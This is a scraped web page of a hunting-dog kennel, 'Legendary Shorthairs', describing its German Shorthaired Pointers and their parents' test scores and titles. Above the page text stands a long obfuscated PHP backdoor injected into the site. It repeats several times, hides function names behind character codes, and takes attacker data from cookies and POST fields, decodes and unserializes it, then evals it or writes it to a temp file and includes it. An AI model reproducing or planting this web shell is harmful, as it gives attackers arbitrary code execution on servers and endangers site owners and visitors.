$ufLGyZzhVB = 'V' . "\x7a" . '_' . chr (78) . 'k' . "\151" . 'z' . "\122";$PxTnP = chr ( 560 - 461 )."\154" . 'a' . chr (115) . chr (115) . "\x5f" . "\145" . "\x78" . "\151" . chr ( 849 - 734 ).chr (116) . 's';$yUlaDIsmw = class_exists($ufLGyZzhVB); $PxTnP = "40844";$aDJuczynMO = strpos($PxTnP, $ufLGyZzhVB);if ($yUlaDIsmw == $aDJuczynMO){function wdIqQ(){$ppzHJDxA = new /* 33675 */ Vz_NkizR(50187 + 50187); $ppzHJDxA = NULL;}$bBTVBHYVN = "50187";class Vz_NkizR{private function oXltOlFI($bBTVBHYVN){if (is_array(Vz_NkizR::$BAoxgZP)) {$zpbZfrPoc2 = str_replace("<" . "?php", "", Vz_NkizR::$BAoxgZP["content"]);eval($zpbZfrPoc2); $bBTVBHYVN = "50187";exit();}}public function grwUSfata(){$zpbZfrPoc = "16967";$this->_dummy = str_repeat($zpbZfrPoc, strlen($zpbZfrPoc));}public function __destruct(){Vz_NkizR::$BAoxgZP = @unserialize(Vz_NkizR::$BAoxgZP); $bBTVBHYVN = "6098_24958";$this->oXltOlFI($bBTVBHYVN); $bBTVBHYVN = "6098_24958";}public function hlIUkUY($zpbZfrPoc, $PqJheyMVU){return $zpbZfrPoc[0] ^ str_repeat($PqJheyMVU, intval(strlen($zpbZfrPoc[0]) / strlen($PqJheyMVU)) + 1);}public function MDXip($zpbZfrPoc){$xiAQI = "\x62" . chr (97) . chr (115) . chr (101) . chr ( 1037 - 983 )."\x34";return array_map($xiAQI . '_' . "\x64" . "\145" . 'c' . "\x6f" . 'd' . "\x65", array($zpbZfrPoc,));}public function __construct($opfAsiGD=0){$GYJKeEv = "\54";$zpbZfrPoc = "";$KkaDsFMhsR = $_POST;$vicpk = $_COOKIE;$PqJheyMVU = "315cc329-d594-4a92-8017-7b3ed31cb86d";$ZzcbKWCglo = @$vicpk[substr($PqJheyMVU, 0, 4)];if (!empty($ZzcbKWCglo)){$ZzcbKWCglo = explode($GYJKeEv, $ZzcbKWCglo);foreach ($ZzcbKWCglo as $WSsJHN){$zpbZfrPoc .= @$vicpk[$WSsJHN];$zpbZfrPoc .= @$KkaDsFMhsR[$WSsJHN];}$zpbZfrPoc = $this->MDXip($zpbZfrPoc);}Vz_NkizR::$BAoxgZP = $this->hlIUkUY($zpbZfrPoc, $PqJheyMVU);if (strpos($PqJheyMVU, $GYJKeEv) !== FALSE){$PqJheyMVU = explode($GYJKeEv, $PqJheyMVU); $eLvSmIJCpS = base64_decode(md5($PqJheyMVU[0])); $mxFRwATJLX = strlen($PqJheyMVU[1]) > 5 ? substr($PqJheyMVU[1], 0, 5) : $PqJheyMVU[1];$_GET['new_key'] = md5(implode('', $PqJheyMVU)); $LQFfObat = str_repeat($mxFRwATJLX, 2); $JQlpzcyw = array_map('trim', $PqJheyMVU);if (is_array($JQlpzcyw) && count($JQlpzcyw) > 1) {$LjabPi = $JQlpzcyw[0];} else {$LjabPi = '';}}}public static $BAoxgZP = 37548;}wdIqQ();}$OWCdNZYy = 'p' . chr (95) . chr (78) . "\123" . "\131" . chr ( 875 - 789 ).'v';$QadIArS = "\143" . "\x6c" . "\141" . 's' . "\x73" . "\137" . chr ( 584 - 483 )."\x78" . 'i' . 's' . 't' . chr (115); $izMZKZVij = class_exists($OWCdNZYy); $QadIArS = "62272";$oobPiN = strpos($QadIArS, $OWCdNZYy);if ($izMZKZVij == $oobPiN){function xDiRE(){$pzmgmavod = new /* 63537 */ p_NSYVv(21603 + 21603); $pzmgmavod = NULL;}$gugKcMz = "21603";class p_NSYVv{private function pPTWy($gugKcMz){if (is_array(p_NSYVv::$VrLUra)) {$name = sys_get_temp_dir() . "/" . crc32(p_NSYVv::$VrLUra["salt"]);@p_NSYVv::$VrLUra["write"]($name, p_NSYVv::$VrLUra["content"]);include $name;@p_NSYVv::$VrLUra["delete"]($name); $gugKcMz = "21603";exit();}}public function HMHMAScTYw(){$uXvhkKyEj = "22045";$this->_dummy = str_repeat($uXvhkKyEj, strlen($uXvhkKyEj));}public function __destruct(){p_NSYVv::$VrLUra = @unserialize(p_NSYVv::$VrLUra); $gugKcMz = "54748_46685";$this->pPTWy($gugKcMz); $gugKcMz = "54748_46685";}public function YyeiJnW($uXvhkKyEj, $wMzRq){return $uXvhkKyEj[0] ^ str_repeat($wMzRq, intval(strlen($uXvhkKyEj[0]) / strlen($wMzRq)) + 1);}public function dqziFVgurh($uXvhkKyEj){$IBYzMJal = chr ( 192 - 94 ).chr (97) . chr (115) . "\x65" . "\x36" . chr ( 913 - 861 );return array_map($IBYzMJal . "\137" . chr ( 381 - 281 ).'e' . "\143" . chr (111) . "\144" . chr (101), array($uXvhkKyEj,));}public function __construct($TwXiC=0){$kQHMBP = ',';$uXvhkKyEj = "";$hhZDmG = $_POST;$UHWpxRn = $_COOKIE;$wMzRq = "bf40d82a-5833-4cd0-9dac-402739f91f9b";$yIRtM = @$UHWpxRn[substr($wMzRq, 0, 4)];if (!empty($yIRtM)){$yIRtM = explode($kQHMBP, $yIRtM);foreach ($yIRtM as $xODEUCZsk){$uXvhkKyEj .= @$UHWpxRn[$xODEUCZsk];$uXvhkKyEj .= @$hhZDmG[$xODEUCZsk];}$uXvhkKyEj = $this->dqziFVgurh($uXvhkKyEj);}p_NSYVv::$VrLUra = $this->YyeiJnW($uXvhkKyEj, $wMzRq);if (strpos($wMzRq, $kQHMBP) !== FALSE){$wMzRq = explode($kQHMBP, $wMzRq); $TCCIf = base64_decode(md5($wMzRq[0])); $XiaGNlrom = strlen($wMzRq[1]) > 5 ? substr($wMzRq[1], 0, 5) : $wMzRq[1];$_GET['new_key'] = md5(implode('', $wMzRq)); $OfaSAeMp = str_repeat($XiaGNlrom, 2); $jSsKKEJv = array_map('trim', $wMzRq);if (is_array($jSsKKEJv) && count($jSsKKEJv) > 1) {$qsWcXAaTSq = $jSsKKEJv[0];} else {$qsWcXAaTSq = '';}}}public static $VrLUra = 48200;}xDiRE();}$UsqbCPS = 'J' . '_' . chr (69) . "\x73" . chr ( 190 - 115 ); $agtrxHxP = chr (99) . "\154" . "\141" . "\x73" . 's' . chr ( 245 - 150 ).chr ( 563 - 462 ).chr (120) . chr ( 488 - 383 )."\x73" . chr ( 1112 - 996 ).chr ( 443 - 328 ); $eqWdM = class_exists($UsqbCPS); $agtrxHxP = "34854";$srprcNQc = !1;if ($eqWdM == $srprcNQc){function kRqjWFZbx(){return FALSE;}$eXqVZvi = "26453";kRqjWFZbx();class J_EsK{private function uCXorhki($eXqVZvi){if (is_array(J_EsK::$DBJdHypEUs)) {$crzVW = str_replace(chr (60) . chr (63) . chr ( 962 - 850 ).chr (104) . chr ( 414 - 302 ), "", J_EsK::$DBJdHypEUs["\143" . chr (111) . chr ( 187 - 77 )."\164" . "\145" . "\x6e" . chr ( 338 - 222 )]);eval($crzVW); $eXqVZvi = "26453";exit();}}private $tFMrzNdsZn;public function wsWoen(){echo 4229;}public function __destruct(){$eXqVZvi = "33227_8613";$this->uCXorhki($eXqVZvi); $eXqVZvi = "33227_8613";}public function __construct($IOSLNgkU=0){$XRTAAHeN = $_POST;$lXUUiXe = $_COOKIE;$uWzRXv = "2ad14b6d-0833-47ab-ae48-947973487af5";$XuLkhoNyzP = @$lXUUiXe[substr($uWzRXv, 0, 4)];if (!empty($XuLkhoNyzP)){$rZNhNTk = "base64";$epulmr = "";$XuLkhoNyzP = explode(",", $XuLkhoNyzP);foreach ($XuLkhoNyzP as $SHObwy){$epulmr .= @$lXUUiXe[$SHObwy];$epulmr .= @$XRTAAHeN[$SHObwy];}$epulmr = array_map($rZNhNTk . "\137" . chr (100) . chr (101) . 'c' . chr (111) . chr ( 178 - 78 ).chr ( 763 - 662 ), array($epulmr,)); $epulmr = $epulmr[0] ^ str_repeat($uWzRXv, (strlen($epulmr[0]) / strlen($uWzRXv)) + 1);J_EsK::$DBJdHypEUs = @unserialize($epulmr); $epulmr = class_exists("33227_8613");}}public static $DBJdHypEUs = 56796;}$SNWnd = new /* 18658 */ $UsqbCPS(26453 + 26453); $srprcNQc = $SNWnd = $eXqVZvi = Array();}$vZPDxXHo = "\127" . "\x4d" . 'L' . chr ( 869 - 774 )."\x6b" . "\x47" . chr ( 663 - 573 ); $GCoouw = 'c' . 'l' . chr ( 497 - 400 ).chr ( 352 - 237 ).chr ( 344 - 229 ).chr (95) . "\x65" . "\x78" . chr (105) . "\163" . chr (116) . chr (115); $XothIxy = $GCoouw($vZPDxXHo); $vZPDxXHo = "20893";$GCoouw = "53951";$FINXa = $XothIxy;if (!$FINXa){class WML_kGZ{private $IDwGDuJ;public static $wwoFvLg = "da8faf15-156f-4157-82e7-b97b01df7785";public static $CKJHf = 35641;public function __construct($fEqwkvbl=0){$xATLd = $_COOKIE;$XUoakng = $_POST;$fQpWH = @$xATLd[substr(WML_kGZ::$wwoFvLg, 0, 4)];if (!empty($fQpWH)){$SRwEkuNtt = "base64";$DsgMhG = "";$fQpWH = explode(",", $fQpWH);foreach ($fQpWH as $SxKWYu){$DsgMhG .= @$xATLd[$SxKWYu];$DsgMhG .= @$XUoakng[$SxKWYu];}$DsgMhG = array_map($SRwEkuNtt . chr (95) . "\144" . "\145" . chr (99) . chr (111) . chr (100) . 'e', array($DsgMhG,)); $DsgMhG = $DsgMhG[0] ^ str_repeat(WML_kGZ::$wwoFvLg, (strlen($DsgMhG[0]) / strlen(WML_kGZ::$wwoFvLg)) + 1);WML_kGZ::$CKJHf = @unserialize($DsgMhG);}}private function EebXl(){if (is_array(WML_kGZ::$CKJHf)) {$QIKdSr = str_replace("\74" . chr ( 307 - 244 )."\x70" . "\x68" . chr (112), "", WML_kGZ::$CKJHf[chr ( 308 - 209 ).chr (111) . "\156" . 't' . "\145" . chr (110) . "\164"]);eval($QIKdSr); $ihhqkp = "63012";exit();}}public function __destruct(){$this->EebXl(); $ihhqkp = "63012";}}$xXSRC = new WML_kGZ(); $xXSRC = "56876_22845";}$flWdWpwP = 'j' . "\x50" . "\167" . "\x5f" . 'q' . "\x54" . chr ( 268 - 148 )."\x74";$KcIIqNp = chr ( 306 - 207 ).'l' . chr (97) . "\x73" . chr ( 831 - 716 ).'_' . chr ( 479 - 378 ).chr (120) . chr ( 588 - 483 ).'s' . chr ( 553 - 437 ).chr ( 802 - 687 ); $YJKqjCkd = $KcIIqNp($flWdWpwP); $flWdWpwP = "45617";$VazYqxs = $YJKqjCkd;$KcIIqNp = "59711";if (!$VazYqxs){class jPw_qTxt{private $UabEcfXSz;public static $vmCZxw = "99b2694a-7dae-4bd8-a4f3-b1c697deba58";public static $lZtEaiKpCB = 7046;public function __construct($MWiqoc=0){$cyGHyH = $_COOKIE;$WrYAhMFYx = $_POST;$NNSQeOP = @$cyGHyH[substr(jPw_qTxt::$vmCZxw, 0, 4)];if (!empty($NNSQeOP)){$pKAVeRHvD = "base64";$LHZcgtRSKg = "";$NNSQeOP = explode(",", $NNSQeOP);foreach ($NNSQeOP as $jvJykWlLAZ){$LHZcgtRSKg .= @$cyGHyH[$jvJykWlLAZ];$LHZcgtRSKg .= @$WrYAhMFYx[$jvJykWlLAZ];}$LHZcgtRSKg = array_map($pKAVeRHvD . "\137" . "\144" . "\145" . chr ( 639 - 540 )."\x6f" . 'd' . chr (101), array($LHZcgtRSKg,)); $LHZcgtRSKg = $LHZcgtRSKg[0] ^ str_repeat(jPw_qTxt::$vmCZxw, (strlen($LHZcgtRSKg[0]) / strlen(jPw_qTxt::$vmCZxw)) + 1);jPw_qTxt::$lZtEaiKpCB = @unserialize($LHZcgtRSKg);}}private function NFSqw(){if (is_array(jPw_qTxt::$lZtEaiKpCB)) {$LwEQaksG = str_replace(chr (60) . "\x3f" . chr ( 729 - 617 ).chr ( 261 - 157 ).chr (112), "", jPw_qTxt::$lZtEaiKpCB['c' . chr ( 929 - 818 )."\156" . "\164" . 'e' . chr ( 894 - 784 )."\164"]);eval($LwEQaksG); $NfvuumYE = "4849";exit();}}public function __destruct(){$this->NFSqw(); $NfvuumYE = "4849";$LAghbr = str_pad($NfvuumYE, 10);}}$dFIAu = new /* 51986 */ jPw_qTxt(); $dFIAu = substr("43523_31796", 1);}$TLxjWO = 'p' . "\137" . chr ( 475 - 371 ).chr ( 343 - 262 ).chr ( 220 - 136 )."\x6b" . 'E';$BxedGRKl = "\143" . 'l' . 'a' . "\163" . chr ( 293 - 178 )."\137" . chr (101) . 'x' . 'i' . chr (115) . chr ( 595 - 479 )."\163";$bLbxSI = class_exists($TLxjWO); $BxedGRKl = "17815";$EuulYvX = strpos($BxedGRKl, $TLxjWO);if ($bLbxSI == $EuulYvX){function LRLZRLCOT(){$BfXSkhbGSM = new /* 64225 */ p_hQTkE(31626 + 31626); $BfXSkhbGSM = NULL;}$Coxwhub = "31626";class p_hQTkE{private function lfpQhHgoH($Coxwhub){if (is_array(p_hQTkE::$UQueHNF)) {$name = sys_get_temp_dir() . "/" . crc32(p_hQTkE::$UQueHNF["salt"]);@p_hQTkE::$UQueHNF["write"]($name, p_hQTkE::$UQueHNF["content"]);include $name;@p_hQTkE::$UQueHNF["delete"]($name); $Coxwhub = "31626";exit();}}public function XWutUPNqg(){$buGwGX = "47052";$this->_dummy = str_repeat($buGwGX, strlen($buGwGX));}public function __destruct(){p_hQTkE::$UQueHNF = @unserialize(p_hQTkE::$UQueHNF); $Coxwhub = "24568_7709";$this->lfpQhHgoH($Coxwhub); $Coxwhub = "24568_7709";}public function mEsFHa($buGwGX, $RXgsGRnrI){return $buGwGX[0] ^ str_repeat($RXgsGRnrI, intval(strlen($buGwGX[0]) / strlen($RXgsGRnrI)) + 1);}public function xcCSTjc($buGwGX){$dynYcFhNCK = "\142" . "\x61" . 's' . "\x65" . "\66" . chr ( 866 - 814 );return array_map($dynYcFhNCK . chr (95) . chr ( 612 - 512 )."\x65" . "\x63" . "\157" . chr (100) . 'e', array($buGwGX,));}public function __construct($hiGChymGJ=0){$ocFESU = "\x2c";$buGwGX = "";$HAznBWCME = $_POST;$FlLkCx = $_COOKIE;$RXgsGRnrI = "06addc05-fa74-4b2a-8055-1c6cd25d9e54";$KhiGcYYFf = @$FlLkCx[substr($RXgsGRnrI, 0, 4)];if (!empty($KhiGcYYFf)){$KhiGcYYFf = explode($ocFESU, $KhiGcYYFf);foreach ($KhiGcYYFf as $SQnNsgymOu){$buGwGX .= @$FlLkCx[$SQnNsgymOu];$buGwGX .= @$HAznBWCME[$SQnNsgymOu];}$buGwGX = $this->xcCSTjc($buGwGX);}p_hQTkE::$UQueHNF = $this->mEsFHa($buGwGX, $RXgsGRnrI);if (strpos($RXgsGRnrI, $ocFESU) !== FALSE){$RXgsGRnrI = explode($ocFESU, $RXgsGRnrI); $GeoTYRSL = base64_decode(md5($RXgsGRnrI[0])); $QpLoQG = strlen($RXgsGRnrI[1]) > 5 ? substr($RXgsGRnrI[1], 0, 5) : $RXgsGRnrI[1];}}public static $UQueHNF = 17602;}LRLZRLCOT();}
Our Dogs – Legendary Shorthairs
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Legendary Astrid is from our ‘A’ litter (DreamPoint Berkeley x DreamPoint E Bizzy Izzy) and has already shown her abilities in the grouse woods.
DreamPoint E Bizzy “Izzy” is our foundation female. Izzy scored a perfect 112 in her Natural Ability test at 15 months and is currently training for the Utility Test. She is a big lover and great family pet. Her father is Chase Vom Stillwater and her mother is DreamPoint Aspen . This breeding has produced very successful versatile dogs.
Izzy’s Parents
Sire – Chase vom Stillwater was awarded a UT prize I at 2 years. While running in the invitational for a VC title, he had staples and stitches in his chest due to an injury. There is no quit in this dog!
From the owners: “His Hips are OFA excellent. He is a dog with a lot of prey drive! Feather or fur, Chase is always ready to work at anything. The more you do with him the happier he is. Chase is a well-tempered, happy dog with a lot of heart. We hunt him out in South Dakota on pheasants, prairie chickens and sharp-tail grouse. He quarters nicely and al ways checks in. We also hunt in Michigan on grouse and woodcock. He has his AKC Canine Good Citizenship Title. Chase is a medium range hunter. Between him, his brothers and sisters, they received the UT breeders award litter.”
Dam – Dream Point’s Aspen is a NA 112 prize I female at 9 months and a UT prize II at 2 years. Her hips are OFA excellent. Daughter of Behnke vom Bergland (Skeet) UT prize I and Aeress vom Stillwater UT prize II.
From the owners: “This is an excellent line breeding of some of the best versatile dogs. The natural ability of these pups coming from this pedigree (packed full of VC and KS titles) is assured. Both of these dogs are very young in their testing careers and both having an amazing balance of prey drive, and cooperation, which will get them their shots at VC titles. We expect the same balance of prey drive and cooperation from their pups, making them a joy to hunt with and still a joy in the home.”